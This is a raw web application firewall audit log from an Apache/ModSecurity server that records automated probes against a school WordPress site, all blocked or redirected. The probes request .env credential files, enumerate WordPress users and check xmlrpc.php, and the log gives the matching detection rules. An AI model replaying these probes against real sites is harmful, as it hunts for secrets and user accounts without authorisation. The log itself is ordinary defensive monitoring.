"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745455739191613 3347 (- - -) Stopwatch2: 1745455739191613 3347; combined=1427, p1=452, p2=943, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4de3cc67-Z-- --8e869228-A-- [24/Apr/2025:07:49:05 +0700] aAmKgclQo524fhbIj1yvKwAAAAI 103.236.140.4 46110 103.236.140.4 8181 --8e869228-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.16 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8e869228-C-- demo.sayHello --8e869228-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e869228-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745455745344559 6531 (- - -) Stopwatch2: 1745455745344559 6531; combined=4719, p1=588, p2=3877, p3=32, p4=35, p5=110, sr=77, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e869228-Z-- --2a746331-A-- [24/Apr/2025:08:18:19 +0700] aAmRW95yz20UX9VrdZMOoAAAAEY 103.236.140.4 52782 103.236.140.4 8181 --2a746331-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept-Charset: utf-8 --2a746331-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a746331-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745457499455136 13544 (- - -) Stopwatch2: 1745457499455136 13544; combined=25904, p1=295, p2=0, p3=0, p4=0, p5=12823, sr=75, sw=0, l=0, gc=12786 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a746331-Z-- --fc73bb18-A-- [24/Apr/2025:08:18:49 +0700] aAmRed5yz20UX9VrdZMOtQAAAFY 103.236.140.4 52896 103.236.140.4 8181 --fc73bb18-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0 Accept-Charset: utf-8 --fc73bb18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc73bb18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745457529994179 757 (- - -) Stopwatch2: 1745457529994179 757; combined=337, p1=300, p2=0, p3=0, p4=0, p5=36, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc73bb18-Z-- --d7bb7c31-A-- [24/Apr/2025:08:33:31 +0700] aAmU68lQo524fhbIj1yxugAAAAU 103.236.140.4 56372 103.236.140.4 8181 --d7bb7c31-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.131.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.131.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --d7bb7c31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7bb7c31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745458411294163 807 (- - -) Stopwatch2: 1745458411294163 807; combined=346, p1=307, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7bb7c31-Z-- --4ee6fa74-A-- [24/Apr/2025:09:09:28 +0700] aAmdWGLuk3f9kLjsdTbNowAAAIw 103.236.140.4 37060 103.236.140.4 8181 --4ee6fa74-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4ee6fa74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ee6fa74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745460568861609 2362 (- - -) Stopwatch2: 1745460568861609 2362; combined=1225, p1=404, p2=792, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ee6fa74-Z-- --6ee7545a-A-- [24/Apr/2025:09:09:37 +0700] aAmdYclQo524fhbIj1y0EwAAAA8 103.236.140.4 37100 103.236.140.4 8181 --6ee7545a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.244 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6ee7545a-C-- demo.sayHello --6ee7545a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ee7545a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745460577755840 5878 (- - -) Stopwatch2: 1745460577755840 5878; combined=4443, p1=550, p2=3653, p3=31, p4=35, p5=103, sr=74, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ee7545a-Z-- --9d339463-A-- [24/Apr/2025:10:18:40 +0700] aAmtkN5yz20UX9VrdZMT5wAAAE4 103.236.140.4 52728 103.236.140.4 8181 --9d339463-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 172.94.24.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 172.94.24.98 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --9d339463-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d339463-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745464720406429 3140 (- - -) Stopwatch2: 1745464720406429 3140; combined=1526, p1=494, p2=934, p3=0, p4=0, p5=98, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d339463-Z-- --1e2b2020-A-- [24/Apr/2025:10:56:21 +0700] aAm2ZWLuk3f9kLjsdTbTngAAAJE 103.236.140.4 33094 103.236.140.4 8181 --1e2b2020-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --1e2b2020-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e2b2020-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745466981057842 874 (- - -) Stopwatch2: 1745466981057842 874; combined=386, p1=347, p2=0, p3=0, p4=0, p5=39, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e2b2020-Z-- --5247eb66-A-- [24/Apr/2025:12:37:41 +0700] aAnOJclQo524fhbIj1zA7QAAAA8 103.236.140.4 56628 103.236.140.4 8181 --5247eb66-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 46.101.111.185 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --5247eb66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5247eb66-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745473061780126 733 (- - -) Stopwatch2: 1745473061780126 733; combined=287, p1=250, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5247eb66-Z-- --db5cf12c-A-- [24/Apr/2025:13:41:09 +0700] aAndBd5yz20UX9VrdZMrfgAAAFY 103.236.140.4 56552 103.236.140.4 8181 --db5cf12c-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 157.230.19.140 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 157.230.19.140 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --db5cf12c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db5cf12c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745476869100032 860 (- - -) Stopwatch2: 1745476869100032 860; combined=404, p1=355, p2=0, p3=0, p4=0, p5=49, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db5cf12c-Z-- --a4c9176c-A-- [24/Apr/2025:14:09:47 +0700] aAnju2Luk3f9kLjsdTbsIwAAAIQ 103.236.140.4 55578 103.236.140.4 8181 --a4c9176c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a4c9176c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4c9176c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745478587511990 2778 (- - -) Stopwatch2: 1745478587511990 2778; combined=1482, p1=481, p2=962, p3=0, p4=0, p5=39, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4c9176c-Z-- --7f3e6026-A-- [24/Apr/2025:14:09:52 +0700] aAnjwGLuk3f9kLjsdTbsJQAAAII 103.236.140.4 55602 103.236.140.4 8181 --7f3e6026-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.172 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7f3e6026-C-- demo.sayHello --7f3e6026-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f3e6026-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745478592494541 6410 (- - -) Stopwatch2: 1745478592494541 6410; combined=4878, p1=622, p2=3942, p3=32, p4=35, p5=138, sr=74, sw=109, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f3e6026-Z-- --fbe3a76d-A-- [24/Apr/2025:15:34:14 +0700] aAn3ht5yz20UX9VrdZM2IwAAAEw 103.236.140.4 46850 103.236.140.4 8181 --fbe3a76d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.121 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.121 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --fbe3a76d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbe3a76d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483654897902 820 (- - -) Stopwatch2: 1745483654897902 820; combined=370, p1=330, p2=0, p3=0, p4=0, p5=40, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbe3a76d-Z-- --d6596e2f-A-- [24/Apr/2025:15:34:15 +0700] aAn3h95yz20UX9VrdZM2JQAAAEQ 103.236.140.4 46856 103.236.140.4 8181 --d6596e2f-B-- POST /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.136 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --d6596e2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6596e2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483655885057 835 (- - -) Stopwatch2: 1745483655885057 835; combined=359, p1=318, p2=0, p3=0, p4=0, p5=40, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6596e2f-Z-- --e64ecb04-A-- [24/Apr/2025:15:34:16 +0700] aAn3iN5yz20UX9VrdZM2JwAAAEg 103.236.140.4 46862 103.236.140.4 8181 --e64ecb04-B-- GET /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.211.251 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.211.251 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept: */* --e64ecb04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e64ecb04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483656867782 679 (- - -) Stopwatch2: 1745483656867782 679; combined=256, p1=223, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e64ecb04-Z-- --e4da3632-A-- [24/Apr/2025:15:34:18 +0700] aAn3islQo524fhbIj1zduAAAAAk 103.236.140.4 46872 103.236.140.4 8181 --e4da3632-B-- POST /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.119 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.119 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* Content-Type: application/x-www-form-urlencoded --e4da3632-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4da3632-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483658346872 816 (- - -) Stopwatch2: 1745483658346872 816; combined=351, p1=310, p2=0, p3=0, p4=0, p5=41, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4da3632-Z-- --48059328-A-- [24/Apr/2025:15:34:19 +0700] aAn3i_iVYlyO1xhz7yMVUgAAAMI 103.236.140.4 46874 103.236.140.4 8181 --48059328-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.136 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --48059328-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48059328-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483659153876 718 (- - -) Stopwatch2: 1745483659153876 718; combined=286, p1=245, p2=0, p3=0, p4=0, p5=40, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48059328-Z-- --3454d27f-A-- [24/Apr/2025:15:34:20 +0700] aAn3jMlQo524fhbIj1zduQAAAA0 103.236.140.4 46880 103.236.140.4 8181 --3454d27f-B-- POST /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.113 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.113 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --3454d27f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3454d27f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483660236176 767 (- - -) Stopwatch2: 1745483660236176 767; combined=328, p1=289, p2=0, p3=0, p4=0, p5=38, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
